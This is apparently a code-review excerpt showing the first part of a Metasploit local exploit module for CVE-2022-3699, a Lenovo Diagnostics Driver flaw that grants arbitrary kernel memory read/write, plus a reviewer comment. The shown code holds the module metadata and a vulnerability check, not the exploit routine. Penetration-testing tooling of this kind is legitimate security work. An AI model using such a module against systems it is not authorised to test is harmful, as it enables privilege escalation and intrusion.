modules/exploits/windows/local/cve_2022_3699_lenovo_diagnostics_driver.rb

```diff
@@ -0,0 +1,122 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Exploit::Local::WindowsKernel
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::ReflectiveDLLInjection
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        {
+          'Name' => 'Lenovo Diagnostics Driver IOCTL memmove',
+          'Description' => %q{
+            Incorrect access control for the Lenovo Diagnostics Driver allows a low-privileged user the ability to
+            issue device IOCTLs to perform arbitrary physical/virtual memory read/write.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'alfarom256',    # Original PoC
+            'jheysel-r7'     # msf module
+          ],
+          'Arch' => [ ARCH_X64 ],
+          'Platform' => 'win',
+          'SessionTypes' => [ 'meterpreter' ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread'
+          },
+          'Targets' => [
+            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+          ],
+          'References' => [
+            [ 'CVE', '2022-3699' ],
+            [ 'URL', 'https://github.com/alfarom256/CVE-2022-3699/' ]
+          ],
+          'DisclosureDate' => '2022-11-09',
+          'DefaultTarget' => 0,
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => []
+          },
+          'Compat' => {
+            'Meterpreter' => {
+              'Commands' => %w[
+                stdapi_railgun_api
+              ]
+            }
+          }
+        }
+      )
+    )
+  end
+
+  def check
+    sysinfo_value = sysinfo['OS']
+
+    if sysinfo_value !~ /windows/i
+      # Non-Windows systems are definitely not affected.
+      return Exploit::CheckCode::Safe
+    end
+
+    handle = open_device('\\\\.\\LenovoDiagnosticsDriver', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+
+    session.railgun.kernel32.CloseHandle(handle)
+    CheckCode::Appears
+  end
+
+  def target_compatible?
+    sysinfo_value = sysinfo['OS']
+
+    build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i
+    vprint_status("Windows Build Number = #{build_num}")
```

Comment:
Depending on what gets merged first; we should be able to use this PR here https://github.com/rapid7/metasploit-framework/pull/17336 to change this logic